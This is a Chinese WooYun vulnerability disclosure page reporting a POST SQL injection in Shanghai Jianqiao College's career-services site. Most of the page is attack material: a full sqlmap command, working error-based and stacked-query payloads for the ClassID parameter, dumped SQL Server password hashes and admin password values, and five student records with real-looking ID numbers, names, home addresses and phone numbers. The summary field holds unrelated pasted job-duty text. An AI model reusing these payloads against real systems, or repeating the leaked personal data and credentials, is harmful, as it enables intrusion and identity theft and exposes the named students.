当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155133

漏洞标题:上海建桥学院就业信息网存在POST型SQL注射漏洞(DBA权限+系统管理员密码泄露+2W多名学生的姓名,密码,身份证号,家庭住址和联系电话泄露)

相关厂商:上海建桥学院

漏洞作者: 路人甲

提交时间:2015-11-23 10:53

修复时间:2015-11-28 10:54

公开时间:2015-11-28 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

毕业生就业指导办公室工作职责和岗位职责
  1、贯彻执行国家教育部和上海市高校毕业生就业指导办公室有关的法规政策,根据学校办学方针负责拟定本校毕业生就业工作计划和具体实施办法。
  2、负责本校毕业生的资格审查,及时向市高校毕业生就业指导中心报送毕业生资源情况及就业方案。
  3、开展毕业生教育和就业指导:进行辅导员培训,组织就业政策、就业信息、就业技巧等方面的讲座,为毕业生就业工作提供有关指导和咨询。
  4、负责接待和处理学生、家长及用人单位的来访和来函,收集用人单位需求信息,及时向毕业生发布。
  5、接受用人单位委托,做好毕业生推荐工作,负责通知毕业生初试、复试、录用等事宜。
  6、负责学生就业协议书的鉴证登记。
  7、按政策规定推荐非上海生源毕业生进沪就业,审核申请进沪就业的非上海生源毕业生的有关材料。
  8、协助办理毕业生报到证的发放及相关的离校手续。
  9、对毕业生进行跟踪调查,收集用人单位反馈信息,撰写调研报告。
  10、负责处理毕业生就业过程中的违约改签及遗留问题。

详细说明:

地址:http://**.**.**.**

$ python sqlmap.py -u "http://**.**.**.**" -p ClassID --technique=ES --
form --random-agent --batch  --hex -D SJQCCenterOfCareer -T dbo.Student -C 考生
号,身份证,姓名,密码,家庭地址,联系电话,联系地址 --dump --start 1 --stop 5


Database: SJQCCenterOfCareer
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.Student                                | 21916   |


选取小部分进行展示:

Table: Student
[5 entries]
+------+--------------------+------+-------+------------------+-------------+----------------------+
| 考生号  | 身份证                | 姓名   | 密码    | 家庭地址             | 联系电话        | 联系地址                 |
+------+--------------------+------+-------+------------------+-------------+----------------------+
| NULL | 310115199205193816 | 刀海松  | A9E11 | 上海市浦东区惠南镇惠东路56号  | 18221642709 | 上海市浦东区惠南镇惠东路56号      |
| NULL | 330411199210290818 | 言俊杰  | A9E11 | 上海市浦东新区康桥路1500号  | 18817591856 | 上海市浦东新区康桥路1500号      |
| NULL | 430424198802040012 | 伊阿娜恋 | A9E11 | <blank>          | <blank>     | <blank>              |
| NULL | 320882199404093068 | 伊亚培  | A9E11 | 江西省南昌市高安市安居小区    | 18817809442 | 上海市浦东新区沪城环路1111号建桥学院 |
| NULL | 411522199502222417 | 易怀信  | A9E11 | 河南光山县和谐家园小区3号楼4楼 | 13782947826 |  上海建桥学院11栋楼2单元1021   |
+------+--------------------+------+-------+------------------+-------------+----------------------+

漏洞证明:

---
Parameter: ClassID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz';WAITFOR DELAY '0:0:5'--&keyword=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current user:    'center'
current user is DBA:    True
database management system users [6]:
[*] center
[*] G&M&sys
[*] IJcenter
[*] JIANQIAO-F9F629\\Administrator
[*] jobdateshare
[*] sa
database management system users password hashes:
[*] BUILTIN\\Administrators [1]:
    password hash: NULL
[*] center [1]:
    password hash: 0x010055463e0a182a46c8d265730e64453fb5668e74c603f43835fe6b5c232810b5066618ff0964d68dea1c3d7f73
        header: 0x0100
        salt: 55463e0a
        mixedcase: 182a46c8d265730e64453fb5668e74c603f43835
        uppercase: fe6b5c232810b5066618ff0964d68dea1c3d7f73
[*] G&M&sys [1]:
    password hash: 0x01005137c3004295d66e8e55edd5d2e97e142b2940dce8dbb4c1c9661838b046abda3d6d3ec8631bf32bb2ec10ee
        header: 0x0100
        salt: 5137c300
        mixedcase: 4295d66e8e55edd5d2e97e142b2940dce8dbb4c1
        uppercase: c9661838b046abda3d6d3ec8631bf32bb2ec10ee
[*] IJcenter [1]:
    password hash: 0x0100531dd87d23aaa5d9ef6e7818d7881207eee96963e0cf2dc32c8e14801317c4b76698b2ca787f7a66cc2d6f9f
        header: 0x0100
        salt: 531dd87d
        mixedcase: 23aaa5d9ef6e7818d7881207eee96963e0cf2dc3
        uppercase: 2c8e14801317c4b76698b2ca787f7a66cc2d6f9f
[*] JIANQIAO-F9F629\\Administrator [1]:
    password hash: NULL
[*] jobdateshare [1]:
    password hash: 0x0100ca632508fbcc39b6a0fbf83319c4e498e0e8e85f55d268aed81d2e133ba002a9b3a0cc6e56dc02eb017cc06d
        header: 0x0100
        salt: ca632508
        mixedcase: fbcc39b6a0fbf83319c4e498e0e8e85f55d268ae
        uppercase: d81d2e133ba002a9b3a0cc6e56dc02eb017cc06d
[*] sa [1]:
    password hash: 0x01000d1d4933d8400a2de95eca66c9f22ca9fbbaa895a86607dbe84db72acabed5f5c089fb2e92d70df1b52f0587
        header: 0x0100
        salt: 0d1d4933
        mixedcase: d8400a2de95eca66c9f22ca9fbbaa895a86607db
        uppercase: e84db72acabed5f5c089fb2e92d70df1b52f0587
Database: tempdb
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
Database: msdb
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.RTblRelships                           | 6910    |
| dbo.RTblIfaceHier                          | 3345    |
| dbo.RTblVersionAdminInfo                   | 2328    |
| dbo.RTblVersions                           | 2328    |
| dbo.RTblNamedObj                           | 2191    |
| dbo.RTblIfaceMem                           | 1186    |
| dbo.RTblPropDefs                           | 794     |
| dbo.RTblClassDefs                          | 537     |
| dbo.RTblIfaceDefs                          | 452     |
| dbo.RTblProps                              | 392     |
| dbo.RTblRelColDefs                         | 320     |
| dbo.backupfile                             | 248     |
| dbo.RTblRelshipDefs                        | 144     |
| dbo.RTblParameterDef                       | 136     |
| dbo.sysjobhistory                          | 128     |
| dbo.backupset                              | 124     |
| dbo.backupmediafamily                      | 117     |
| dbo.backupmediaset                         | 117     |
| dbo.sysconstraints                         | 99      |
| dbo.RTblSites                              | 38      |
| dbo.RTblRelshipProps                       | 28      |
| dbo.syscategories                          | 19      |
| dbo.RTblTypeLibs                           | 16      |
| dbo.sysalerts                              | 9       |
| dbo.restorefile                            | 8       |
| dbo.restorefilegroup                       | 4       |
| dbo.restorehistory                         | 4       |
| dbo.sysdbmaintplan_databases               | 3       |
| dbo.sysdbmaintplans                        | 3       |
| dbo.sysdtscategories                       | 3       |
| dbo.syssegments                            | 3       |
| dbo.sysdbmaintplan_jobs                    | 2       |
| dbo.sysjobs                                | 2       |
| dbo.sysjobs_view                           | 2       |
| dbo.sysjobschedules                        | 2       |
| dbo.sysjobservers                          | 2       |
| dbo.sysjobsteps                            | 2       |
| dbo.RTblDatabaseVersion                    | 1       |
| dbo.systargetservers_view                  | 1       |
+--------------------------------------------+---------+
Database: SJQCCenterOfCareer
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.Student                                | 21916   |
| dbo.V_StudentSeek                          | 21916   |
| dbo.V_StudentCheck                         | 21914   |
| dbo.UserLoginRecord                        | 15601   |
| dbo.Student_among                          | 13422   |
| dbo.student_temp                           | 13422   |
| dbo.Application                            | 6700    |
| dbo.V_StuApplication                       | 6653    |
| dbo.V_EntApplication                       | 6293    |
| dbo.Position                               | 5690    |
| dbo.EnterpriseDatabase                     | 5039    |
| dbo.Faxposion                              | 3301    |
| dbo.Enterprise                             | 2816    |
| dbo.Certificate                            | 2654    |
| dbo.Recruitment                            | 2208    |
| dbo.Message                                | 2014    |
| dbo.V_EntMessage                           | 2011    |
| dbo.V_StuMessage                           | 1993    |
| dbo.PushRecord                             | 992     |
| dbo.Activity                               | 874     |
| dbo.V_Activity                             | 836     |
| dbo.V_PositionSeek                         | 836     |
| dbo.Information                            | 629     |
| dbo.FaxApplication                         | 574     |
| dbo.V_StuFaxApplication                    | 567     |
| dbo.V_Information                          | 505     |
| dbo.Answer                                 | 404     |
| dbo.V_Answer                               | 404     |
| dbo.Link                                   | 300     |
| dbo.sysconstraints                         | 201     |
| dbo.T_ZXBZ_DW                              | 98      |
| dbo.LeaveMessage                           | 93      |
| dbo.CampusRecruitment                      | 92      |
| dbo.dwhy                                   | 92      |
| dbo.DepaUser                               | 89      |
| dbo.V_Link                                 | 81      |
| dbo.T_ZXBZ_ZY                              | 78      |
| dbo.T_ZXBZ_MZ                              | 57      |
| dbo.T_ZXBZ_XL                              | 29      |
| dbo.dtproperties                           | 14      |
| dbo.dwxz                                   | 14      |
| dbo.T_ZXBZ_ZZMM                            | 14      |
| dbo.depaintroduction                       | 9       |
| dbo.MeetTable                              | 7       |
| dbo.T_ZXBZ_XB                              | 4       |
| dbo.syssegments                            | 3       |
| dbo.Administration                         | 2       |
| dbo.counter                                | 1       |
| dbo.xKeyTable                              | 1       |
+--------------------------------------------+---------+
Database: pubs
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.roysched                               | 86      |
| dbo.employee                               | 43      |
| dbo.sysconstraints                         | 34      |
| dbo.titleauthor                            | 25      |
| dbo.titleview                              | 25      |
| dbo.authors                                | 23      |
| dbo.sales                                  | 21      |
| dbo.titles                                 | 18      |
| dbo.jobs                                   | 14      |
| dbo.pub_info                               | 8       |
| dbo.publishers                             | 8       |
| dbo.stores                                 | 6       |
| dbo.discounts                              | 3       |
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
Database: master
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.whitepaper                             | 4000    |
| INFORMATION_SCHEMA.PARAMETERS              | 3617    |
| dbo.Enterprise                             | 1195    |
| INFORMATION_SCHEMA.ROUTINES                | 1019    |
| dbo.spt_values                             | 730     |
| INFORMATION_SCHEMA.COLUMNS                 | 692     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       | 302     |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         | 159     |
| dbo.dwhy                                   | 92      |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        | 63      |
| dbo.mzdmb                                  | 58      |
| INFORMATION_SCHEMA.TABLES                  | 58      |
| dbo.Administrator                          | 56      |
| dbo.dwdq                                   | 40      |
| dbo.spt_datatype_info                      | 36      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        | 34      |
| dbo.dwxz                                   | 33      |
| dbo.spt_server_info                        | 29      |
| INFORMATION_SCHEMA.VIEWS                   | 26      |
| dbo.spt_provider_types                     | 25      |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE | 24      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        | 24      |
| dbo.gzzwb                                  | 18      |
| dbo.sysconstraints                         | 17      |
| dbo.Entcode                                | 16      |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  | 16      |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       | 16      |
| dbo.EVisitTable                            | 13      |
| dbo.depacode                               | 10      |
| dbo.spt_datatype_info_ext                  | 10      |
| INFORMATION_SCHEMA.SCHEMATA                | 8       |
| dbo.obtainway                              | 7       |
| dbo.syslogins                              | 7       |
| dbo.tjxy                                   | 4       |
| dbo.SMInfo                                 | 3       |
| dbo.syssegments                            | 3       |
| dbo.MSreplication_options                  | 2       |
| dbo.Information                            | 1       |
| dbo.spt_monitor                            | 1       |
| dbo.sysoledbusers                          | 1       |
| dbo.SysParameter                           | 1       |
+--------------------------------------------+---------+
Database: model
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
Database: Northwind
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.[Order Details Extended]               | 2155    |
| dbo.[Order Details]                        | 2155    |
| dbo.Invoices                               | 2155    |
| dbo.[Order Subtotals]                      | 830     |
| dbo.[Orders Qry]                           | 830     |
| dbo.Orders                                 | 830     |
| dbo.[Summary of Sales by Quarter]          | 809     |
| dbo.[Summary of Sales by Year]             | 809     |
| dbo.[Customer and Suppliers by City]       | 120     |
| dbo.Customers                              | 91      |
| dbo.[Quarterly Orders]                     | 86      |
| dbo.[Product Sales for 1997]               | 77      |
| dbo.[Sales by Category]                    | 77      |
| dbo.Products                               | 77      |
| dbo.[Alphabetical list of products]        | 69      |
| dbo.[Current Product List]                 | 69      |
| dbo.[Products by Category]                 | 69      |
| dbo.[Sales Totals by Amount]               | 66      |
| dbo.Territories                            | 53      |
| dbo.EmployeeTerritories                    | 49      |
| dbo.sysconstraints                         | 43      |
| dbo.Suppliers                              | 29      |
| dbo.[Products Above Average Price]         | 25      |
| dbo.Employees                              | 9       |
| dbo.[Category Sales for 1997]              | 8       |
| dbo.Categories                             | 8       |
| dbo.Region                                 | 4       |
| dbo.Shippers                               | 3       |
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: master
Table: Administrator
[1 column]
+--------+---------+
| Column | Type    |
+--------+---------+
| Pass   | varchar |
+--------+---------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: Administrator
[5 entries]
+--------+
| Pass   |
+--------+
| 18AA47 |
| 70E78  |
| 72FEC  |
| A9E11  |
| D5438  |
+--------+
Database: master
Table: syslogins
[7 entries]
+-------------------------------------------------+
| password                                        |
+-------------------------------------------------+
| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |
| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |
| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |
| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |
| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |
| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |
| \x01??\xefΜ\xf1\x86\xb7???????\x95\xd4???Ǣ????? |
+-------------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ClassID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword=
    Type: stacked sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ClassID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz';WAITFOR DELAY '0:0:5'--&keyword=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: SJQCCenterOfCareer
Table: Student
[47 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| 一等奖     | char     |
| 三等奖     | char     |
| 专业      | varchar  |
| 专业代码    | varchar  |
| 个人特长    | varchar  |
| 个人经历    | text     |
| 二等奖     | char     |
| 入学年份    | int      |
| 公开简历    | char     |
| 其他奖     | text     |
| 其他证书    | text     |
| 出生年月    | datetime |
| 图片类型    | char     |
| 培养年限    | float    |
| 大学英语    | varchar  |
| 姓名      | varchar  |
| 学制      | float    |
| 学历      | varchar  |
| 学号      | varchar  |
| 学院      | varchar  |
| 家庭地址    | varchar  |
| 家庭邮编    | varchar  |
| 密码      | varchar  |
| 就业意向    | varchar  |
| 性别      | char     |
| 手机      | varchar  |
| 担任过社会工作 | varchar  |
| 推荐意见    | text     |
| 政治面貌    | varchar  |
| 是否签约    | char     |
| 校级以上奖励  | text     |
| 毕业年份    | varchar  |
| 民族      | varchar  |
| 求职意向    | varchar  |
| 生源地     | varchar  |
| 生源确认    | char     |
| 电子邮箱    | varchar  |
| 社会实践情况  | text     |
| 简历类型    | varchar  |
| 考生号     | varchar  |
| 联系地址    | varchar  |
| 联系电话    | varchar  |
| 自我介绍    | text     |
| 计算机级    | varchar  |
| 身份证     | varchar  |
| 辅修专业    | varchar  |
| 邮编      | char     |
+---------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ClassID (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz' AND 2526=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2526=2526) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'PsDs'='PsDs&keyword=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Field=%E4%BF%A1%E6%81%AF%E6%A0%87%E9%A2%98&ClassID=TFuz';WAITFOR DELAY '0:0:5'--&keyword=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: SJQCCenterOfCareer
Table: Student
[5 entries]
+------+--------------------+------+-------+------------------+-------------+----------------------+
| 考生号  | 身份证                | 姓名   | 密码    | 家庭地址             | 联系电话        | 联系地址                 |
+------+--------------------+------+-------+------------------+-------------+----------------------+
| NULL | 310115199205193816 | 刀海松  | A9E11 | 上海市浦东区惠南镇惠东路56号  | 18221642709 | 上海市浦东区惠南镇惠东路56号      |
| NULL | 330411199210290818 | 言俊杰  | A9E11 | 上海市浦东新区康桥路1500号  | 18817591856 | 上海市浦东新区康桥路1500号      |
| NULL | 430424198802040012 | 伊阿娜恋 | A9E11 | <blank>          | <blank>     | <blank>              |
| NULL | 320882199404093068 | 伊亚培  | A9E11 | 江西省南昌市高安市安居小区    | 18817809442 | 上海市浦东新区沪城环路1111号建桥学院 |
| NULL | 411522199502222417 | 易怀信  | A9E11 | 河南光山县和谐家园小区3号楼4楼 | 13782947826 |  上海建桥学院11栋楼2单元1021   |
+------+--------------------+------+-------+------------------+-------------+----------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 10:54

厂商回复:

最新状态:

暂无